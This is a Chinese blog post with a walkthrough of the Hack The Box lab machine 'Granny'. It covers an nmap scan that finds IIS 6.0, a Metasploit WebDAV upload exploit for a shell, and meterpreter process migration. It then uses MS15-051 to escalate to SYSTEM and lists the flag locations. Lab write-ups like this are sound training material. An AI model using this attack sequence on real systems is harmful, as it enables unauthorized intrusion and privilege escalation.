HTB-Granny

最新推荐文章于 2022-04-07 22:30:16 发布
最新推荐文章于 2022-04-07 22:30:16 发布
阅读量412 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yutianovo/article/details/112687642
版权

http://blog.yutian233.xyz/

靶机描述

清单

  • 信息搜集

    • nmap
    • iis 6

  • 获取shell

    • iis_webdav_upload_asp

  • 提权

    • ms15_051_client_copy_image

信息搜集

靶机IP

image-20210115202652728

端口扫描

nmap 10.10.10.15 -A

Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-ntlm-info: 
|   Target_Name: GRANNY
|   NetBIOS_Domain_Name: GRANNY
|   NetBIOS_Computer_Name: GRANNY
|   DNS_Domain_Name: granny
|   DNS_Computer_Name: granny
|_  Product_Version: 5.2.3790
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction

得到了 IIS 版本为 6.0

MSF

use exploit/windows/iis/iis_webdav_upload_asp

image-20210115202848220

image-20210115202919331

得到了一个低权限用户

System

use post/multi/recon/local_exploit_suggester

image-20210115203008434

这是使用到的是图中标红的

在提权之前需要先迁移 pid

meterpreter > getpid
Current pid: 3592
# 获取msfshell 的pid

PID迁移

image-20210115203228606

meterpreter > migrate 2676
[*] Migrating from 3592 to 2676...
[*] Migration completed successfully.

接下来就可以 run

image-20210115203312402

得到 SYSTEM

image-20210115203410428

root.txt

  • C:\Documents and Settings\Administrator\Desktop

user.txt

  • C:\Documents and Settings\Lakis\Desktop
赛博雨天
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
HTB靶场系列 Windows靶机 Granny靶机
m0_57221101的博客
01-29 1502
勘探 还是使用nmap进行侦擦 先大致扫描 nmap 10.10.10.15 Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-01 10:29 CST Nmap scan report for 10.10.10.15 Host is up (0.38s latency). Not shown: 999 filtered ports PORT STATE SERVICE 80/tcp open http Nmap done: 1 IP a
HTB-Solutions
03-09
HTB-Solutions
HTB-oscplike-Bastard+Granny
m0_53302733的博客
04-05 1099
HTB-oscplike-Bastard+Granny Bastard medium难度的bastard 靶机IP 10.10.10.9 sudo nmap -sC -sV -A -p- --min-rate=5000 -Pn 10.10.10.9 80/tcp open http Microsoft IIS httpd 7.5 135/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Win
No.55-HackTheBox-windows-Granny-Walkthrough渗透学习
qq_34801745的博客
02-16 998
** HackTheBox-windows-Granny-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/14 靶机难度:容易(3.0/10) 靶机发布日期:2017年10月12日 靶机描述: Granny, while similar to Grandpa, can be exploited using se...
HTB-oscplike-Arctic+Grandpa+Silo
m0_53302733的博客
04-07 2001
HTB-oscplike-Arctic+Grandpa+Silo Arctic easy难度的arctic 靶机IP 10.10.10.11 sudo nmap -sC -sV -A -p- --min-rate=5000 -Pn 10.10.10.11 PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 8500/tcp open fmtp? 49154/tcp open msrpc Micr
No.57-HackTheBox-windows-Grandpa-Walkthrough渗透学习
qq_34801745的博客
02-17 530
** HackTheBox-windows-Arctic-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/9 靶机难度:中级(4.7/10) 靶机发布日期:2017年10月4日 靶机描述: Grandpa is one of the simpler machines on Hack The Box, howev...
qos-htb-开源
05-03
qos-htb是您一直在等待的简单带宽管理解决方案,graphix制作了图表,您可以在一秒钟之内查看到底谁在消耗带宽!
xml-HTB-开源
05-02
xml-HTB是用于自动生成bash脚本的工具,该工具可在Linux上设置HTB。 它使用xml配置文件。 它易于使用,具有许多功能:多种深度的类,可配置的叶子,u32和fw过滤器,可同时配置两个输入
my-htb-tools3
03-19
my-htb-tools3
HTB-writeups:此仓库包含HackTheBox的文章
05-01
HTB内容此存储库包含针对HackTheBox挑战,机器和专业实验室的文章。
推箱子2-向右推!_保持冷静,砍箱子-爷爷
08-18 309
推箱子2-向右推!Hack The Box (HTB) is an online platform allowing you to test your penetration testing skills. It contains several challenges that are constantly updated. Some of them are simulating real wor...
推箱子2-向右推!_保持冷静,砍箱子-奶奶
cumian8165的博客
08-18 442
推箱子2-向右推!Hack The Box (HTB) is an online platform that allows you to test your penetration testing skills. It contains several challenges that are constantly updated. Some of them are simulating real ...
GRA FILM AND VIDEO
热门推荐
.Fantasia.
04-20 1万+
Classic Hits Video New York City 1970s.L. Ingrassia 1214 W. Boston Post Road Mamaroneck, NY 10543 Fuk Graff NEW!!This new DVD successfully captures some of the raw emotion of New Yorks current underg
基于STM32控制遥控车的蓝牙应用程序
06-27
基于STM32控制遥控车的蓝牙应用程序
Memcached 1.2.4 版本源码包
06-27
粤嵌gec6818开发板项目Memcached是一款高效分布式内存缓存解决方案,专为加速动态应用程序和减轻数据库压力而设计。它诞生于Danga Interactive,旨在增强LiveJournal.com的性能。面对该网站每秒数千次的动态页面请求和超过七百万的用户群,Memcached成功实现了数据库负载的显著减少,优化了资源利用,并确保了更快的数据访问速度。。内容来源于网络分享,如有侵权请联系我删除。另外如果没有积分的同学需要下载,请私信我。
软件项目开发全过程文档资料.zip
06-27
软件项目开发全过程文档资料.zip
Java基础上机题-分类整理版.doc
06-27
Java基础上机题-分类整理版
Java-JDBC学习教程-由浅入深.doc
最新发布
06-27
Java-JDBC学习教程-由浅入深
format htb
08-24
HTB is an abbreviation for Hack The Box, which is an online platform that provides hands-on penetration testing and hacking challenges. It allows users to simulate real-world cybersecurity scenarios ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值